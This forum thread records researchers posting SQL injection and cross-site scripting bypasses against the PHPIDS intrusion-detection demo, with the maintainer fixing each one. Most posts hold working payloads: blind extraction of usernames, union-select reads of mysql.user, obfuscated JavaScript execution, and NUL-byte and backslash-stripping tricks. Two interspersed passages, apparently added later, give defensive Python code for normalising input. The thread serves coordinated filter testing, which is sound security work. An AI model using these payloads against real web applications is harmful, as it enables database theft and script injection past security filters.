Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: June 29, 2010 02:47PM

Will be fixed next week - sorry for the long delay... @Reiners indeed :)

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: July 12, 2010 05:27PM

extract data blind with PHPIDS impact 0:

m' sounds like (select if (mid((select `username` from users limit 1),1,1)=0x71 , 0 , \N)) and '1

link (because every space is needed):

http://demo.php-ids.org/?test=m'%20sounds%20like%20(select%20if%20%20(mid((select%20%60username%60%20from%20users%20limit%201),1,1)=0x71%20,%200%20,%20%5CN))%20and%20'1

interesting to note:
- functions can be called with lots of spaces before parenthesis: SELECT ascii (1)
- there can be a lot of bullshit in this part and the syntax is still valid:
select(name) `bullshit bullshit bullshit`from users
- this works as well:
select`name`buuullshit from users



Edited 1 time(s). Last edit at 07/12/2010 05:30PM by Reiners.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: lightos
Date: July 12, 2010 06:48PM

Reiners Wrote:
-------------------------------------------------------
> interesting to note:
> - functions can be called with lots of spaces
> before parenthesis: SELECT ascii (1)

it's a nice trick, but from what I remember it doesn't work with all functions.

> - there can be a lot of bullshit in this part and
> the syntax is still valid:
> select(name) `bullshit bullshit bullshit`from
> users
> - this works as well:
> select`name`buuullshit from users

just a MySQL Alias in both cases

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: August 07, 2010 04:40AM

1) Iterator - very dangerous function (FF)
* w = this <-- forbidden
* bypass:
xyz=Iterator([this]).next()
zyx=xyz[1].alert
zyx(1)

2) for each - very dangerous cycle (FF)

for each (x in{a:this})x=x.alert
x(1)

3) // also 09,0C,0B,0A,0D,A0

xzy={x :this}.x.alert
xzy(1)

http://demo.php-ids.org/?test=xzy={x%20:this}.x.alert%0Axzy%281%29

4) (GC)
xde=(1, /at\ob/\i),
rty=(1, /atob\t/\i),
atat=xde(rty),
alal=(1,/YWxlcnQ\t/\i), 
ghj=(1,/YWxlcn\Q/\i), 
alal=ghj(alal),
sor=atat.sort,
sor1=sor(),
atat=sor1[atat],
alal=atat(alal),
alal=sor1[alal],
alal(1)

5)
* x.constructor & concatenation <-- forbidden
* bypass:
ale= (1, "ale" ),
rt= (1, "rt (1),0 "),
alal= ale+rt,
x2=02.constructor,
y=x2.constructor,
y(alal)()

or

t="t (1),0 ",
x2 = (1, {x2:02.constructor,a:0}.x2),
xyz = (1, {xyz:x2.constructor,a:0}.xyz),
xyz("aler" + t)()

*sorry, I'm very difficult to stay.)

6) for in - yet another way for getting a string that is filtered.

for(lo in{j:this}.j)!/ale.t/(lo)||this[{},lo](+!'')



LeverOne

----------------------
~Veritas~



Edited 3 time(s). Last edit at 08/08/2010 08:15AM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: August 08, 2010 01:44PM

Haha nice - I liked the /./\i trick most - one character but amazing impact!

Thanks :)

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: August 09, 2010 05:11AM

Yeah those are sweet bypasses :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS 0.6.4
Posted by: LeverOne
Date: August 10, 2010 08:43AM

Thanks!

Quote

I liked the /./\i trick

look also:
1) xde = (1 , {a:0,b:/atob/,c:0}.b)
2) xde = (1,/atob/\ i)

In general, assignment is a global problem.

x=0||this.alert
x(1)

t="t (1),0 "
for each (lo2 in{1:[].filter})
for (fake in!t);
dd=lo2.constructor
ff=dd("aler"+ t)()

Opera only <-- This vector closes my week of the PHPIDS.

xyz = "javas	\	cript:aler	\	t (1),0",
lo = {},
lo[xyz] = 0
for (0||location in"fake",lo)0





Edited 2 time(s). Last edit at 08/12/2010 01:30PM by LeverOne.

Re: PHPIDS 0.6.4
Posted by: Reiners
Date: September 15, 2010 10:58AM

that' sounds like 'a bug



Edited 1 time(s). Last edit at 09/15/2010 11:22AM by Reiners.

Re: PHPIDS 0.6.4
Posted by: Reiners
Date: September 15, 2010 11:18AM

jump'in (select 'Water') or '1



Edited 2 time(s). Last edit at 09/15/2010 11:20AM by Reiners.

Re: PHPIDS 0.6.4
Posted by: Anonymous User
Date: September 19, 2010 01:25PM

All fixed - thanks!

Re: PHPIDS 0.6.4
Posted by: Gareth Heyes
Date: February 23, 2011 12:30PM

I went all retro
You need phpids in ie7 compat for it to work on IE9 and you have to click a link

[www.businessinfo.co.uk]




Edited 2 time(s). Last edit at 02/23/2011 12:30PM by Gareth Heyes.

Re: PHPIDS 0.6.5
Posted by: Reiners
Date: March 30, 2011 11:32AM

welcome back =)

fo"o'or'1

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: April 02, 2011 10:49AM

Thx :) Fixed!

Re: PHPIDS 0.6.5
Posted by: lightos
Date: April 10, 2011 09:34AM

It had been a while since I had posted a bypass, figured it was time.
Almost hurts to see this one get fixed.

null' or @:=(select all user'' from mysql . user limit 1) union#
#
select @'

http://demo.phpids.org/?test=null' or @:=(select all user'' from mysql . user limit 1)union%23%0A%23%0Aselect @'

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: April 10, 2011 10:57AM

Wow - I hear you :) At least three bypass techniques in one vector (probably more but I managed to spot three of them :D). Thx!

Re: PHPIDS 0.6.5
Posted by: lightos
Date: April 11, 2011 02:30AM

A bit more abuse with the #

1' and #aa
#bb
version() like trim(0x3520)'

1'and #
#aa
0 union#
#bb
select `user`u#
#cc
from mysql.user '



Edited 1 time(s). Last edit at 04/11/2011 02:34AM by lightos.

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: April 16, 2011 11:40AM

Neat :) Those bloody comments are ever returning buggers - I installed another fix - knowing that you can possibly break it within minutes.

Re: PHPIDS 0.6.5
Posted by: lightos
Date: April 16, 2011 09:44PM

You're right.

1'and #
#aa
0 union#
#bb
select version()`

1'and #
#aa
0 union#
#bb
select (select `user` from#
#cc
mysql.user limit 1)'

Will leave it at that for now.
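The MySQL vectors in this thread (Reiners' spaces-before-parenthesis and `mysql . user` notes, lightos' `#`-comment-plus-newline splitting) all exploit the gap between what a pattern sees and what the MySQL parser sees. The following added example, which is my own code and not part of PHPIDS or this thread, canonicalises input the way MySQL reads it before a signature is applied; the signatures are deliberately minimal and the samples are transcribed from the posts above.

```python
import re

# Constructed inputs: the MySQL vectors quoted in the posts above, used here
# only to show what a signature sees before and after canonicalisation.
SAMPLES = [
    "1'and #\n#aa\n0 union#\n#bb\nselect version()`",
    "null' or @:=(select all user'' from mysql . user limit 1) union#\n#\nselect @'",
    "m' sounds like (select if  (mid((select `username` from users limit 1),1,1)=0x71 , 0 , \\N)) and '1",
]

def strip_mysql_comments(sql: str) -> str:
    """Drop comments the way the MySQL parser does: '#' and '-- ' run to end of
    line, /* ... */ is removed, but the body of a /*! ... */ conditional comment
    is kept because the server executes it."""
    sql = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", sql, flags=re.S)
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"(#|--[ \t]).*?(?=\n|$)", " ", sql)
    return sql

def canonicalise(sql: str) -> str:
    """Normalise whitespace variants MySQL tolerates but naive patterns miss:
    newlines left behind by comments, spaces before '(' (SELECT ascii (1)) and
    spaces around '.' (mysql . user). Aliases are left alone; only layout changes."""
    sql = strip_mysql_comments(sql)
    sql = re.sub(r"\s+", " ", sql)
    sql = re.sub(r"\s*\(\s*", "(", sql)
    sql = re.sub(r"\s*\.\s*", ".", sql)
    return sql.strip().lower()

UNION_SELECT = re.compile(r"\bunion\b(?:\s+all|\s+distinct)?\s+select\b")
SUBSELECT = re.compile(r"\(select\b")

def inspect(raw: str) -> dict:
    """Compare a signature hit on the raw request with one on the canonical form."""
    canon = canonicalise(raw)
    return {
        "canonical": canon,
        "raw_union_select": bool(UNION_SELECT.search(raw.lower())),
        "canon_union_select": bool(UNION_SELECT.search(canon)),
        "canon_subselect": bool(SUBSELECT.search(canon)),
    }

if __name__ == "__main__":
    for s in SAMPLES:
        print(inspect(s))
```

The raw form of the first two samples never matches `union ... select`; the canonical form does, which is the whole difference between the bypass and a detection.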

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: May 22, 2011 04:54PM

Finally managed to deploy the fix ;) Thx!

Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 11, 2011 03:09PM

Hi,
Very nice configuration, but easy to pass on IE:

http://demo.phpids.org/?test=ale\0rt(kkk.v);\/\/<b name=kkk v=Hafif >

In addition, simple DoS are available in all browsers (though low impact)

http://demo.phpids.org/?test=location%2b%2b
http://demo.phpids.org/?test=%2b%2blocation
http://demo.phpids.org/?test=location%2b=1
...and so on.

Re: PHPIDS 0.6.5
Posted by: lightos
Date: June 14, 2011 02:26PM

Hehe that was pretty easy, nice stuff!

Edit: http://demo.phpids.org/?test='uni\0on select 1-\0-\0+

Yikes!



Edited 1 time(s). Last edit at 06/14/2011 02:50PM by lightos.

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: June 14, 2011 03:42PM

I spotted the bug and managed to fix it - just committed and deployed the fresh sources. That happens when you are spoiled by Suhosin ;)

Re: PHPIDS 0.6.5
Posted by: Gareth Heyes
Date: June 14, 2011 04:59PM

The php dev team in their infinite wisdom don't consider the conversion of \0 to NUL a bug. Crazy bastards.


Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 17, 2011 12:07PM

WOW, your filters are hard to beat !!
BTW, very very nice book... couldn't stop reading !!!!

Your book said that IE will fail to handle NULL bytes, which leads me to the bypass with PHP. The rules are good enough to stop the attack on modsecurity.

What do you think about the DoS scenarios. They can be naughty if persistent injections are available.



Edited 2 time(s). Last edit at 06/17/2011 12:13PM by hafif.

Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 17, 2011 01:22PM

Hi Again,

All browsers:
http://demo.phpids.org/?test=ale\rt%281%29

A more noticeable attack:
http://demo.phpids.org/?test=\%3C\/textarea%3E\%3C\script%3Ealer\t%281%29%3C\/\script%3E


I think, this is due to the removal of the '\' char...

The same technique can be used for other attacks.



Edited 5 time(s). Last edit at 06/17/2011 01:46PM by hafif.

Re: PHPIDS 0.6.5
Posted by: Gareth Heyes
Date: June 17, 2011 02:52PM

tut tut mario with stripslashes :)

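hafif's `\`-removal observation, Gareth's stripslashes remark and the earlier `\0`-to-NUL note describe one defect: the detector inspected the parameter as received, while the demo ran stripslashes() on it afterwards and the browser then dropped the NUL bytes. The following added example (my own code, not PHPIDS or the demo) models PHP's stripslashes() and shows a check that inspects the rendered form instead of the raw one; the samples are transcribed from the posts above.

```python
import re

def php_stripslashes(s: str) -> str:
    """Model of PHP's stripslashes(): each backslash is dropped and the character
    after it kept, except that '\\0' becomes a real NUL byte (documented PHP
    behaviour that, as the thread notes, PHP does not treat as a bug)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\":
            if i + 1 < len(s):
                out.append("\x00" if s[i + 1] == "0" else s[i + 1])
            i += 2  # a trailing lone backslash is simply dropped
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

# Signatures are deliberately simple; the point is which text they are run on.
JS_CALL = re.compile(r"alert\s*\(", re.I)
UNION_SELECT = re.compile(r"union\s+select", re.I)

def naive_check(raw: str, sig: re.Pattern) -> bool:
    """Inspect the parameter exactly as received, before the app touches it."""
    return bool(sig.search(raw))

def hardened_check(raw: str, sig: re.Pattern) -> bool:
    """Inspect what the application will actually emit: apply the same
    stripslashes() transform, then drop NUL bytes (Suhosin strips them and the
    IE parser of the day ignored them, which is the thread's ale\\0rt case)."""
    rendered = php_stripslashes(raw).replace("\x00", "")
    return bool(sig.search(rendered))

# Constructed inputs transcribed from the posts above.
CASES = [
    ("ale\\0rt(kkk.v)", JS_CALL),
    ("ale\\rt(1)", JS_CALL),
    ("'uni\\0on select 1-\\0-\\0+", UNION_SELECT),
]

if __name__ == "__main__":
    for raw, sig in CASES:
        print(repr(raw), naive_check(raw, sig), hardened_check(raw, sig))
```

Every case fails the naive check and passes the hardened one; the general rule is that normalisation must happen before inspection and must match what the application does to the data.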

Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 17, 2011 03:57PM

Hey, I have a question,
Am I supposed to be able to inject a simple <a href> tag?
This could be used for phishing attacks.

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: June 22, 2011 04:58PM

@hafif Excuse the late reply - didn't find time to look into the issues up to now. First of all: awesome finds! Some were caused by changes in PHP 5.3.x, some were plain bugs, one was a bug in the demo resulting from the server move - overall I had three locations to fix :)

It should be quite okay now - although I have a certain feeling that you might find more. About the DoS - I am not sure yet what to do about that. Will address it in a later release. Same for the links. Usually devs might wanna allow arbitrary HTTP(s) URLs - sometimes not. We should - as far as I can think now - include an option in the Config.ini.php to delegate the setting to the HTMLPurifier API we use under the hood.

Thanks again, great finds!
.mario

Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 23, 2011 09:25PM

.mario Wrote:
-------------------------------------------------------
> First of all:
> awesome finds! Some were caused by changes in PHP
> 5.3.x, some were plain bugs, one was a bug in the
> demo resulting from the server move - overall I
> had three locations to fix :)

THANKS :)

The following bypass was not so hard and uses the shift operator <<.
The real challenge, which was extremely difficult, was the fact that there are multiple onclick injection points which caused errors before the script tag is launched (it should be noted that this difficulty might be limited to the scope of the demo application).

But I managed to get everyone satisfied:
http://demo.phpids.org/?test=%0d%2ba%0d>>setTimeout(a(1).a%2ba(1).b%2ba(1).c,1000);%0d'1';"1"="1";a="1\"\n<a name=a a=con b=fi c=rm(120) >1<<1\'1'1\"1";

Works on IE.



Edited 2 time(s). Last edit at 06/24/2011 12:24PM by hafif.

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: June 25, 2011 01:10PM

Ha - you seem to know the regexes better than me meanwhile ;)

Again, priceless find! Fixed and thanks a lot.
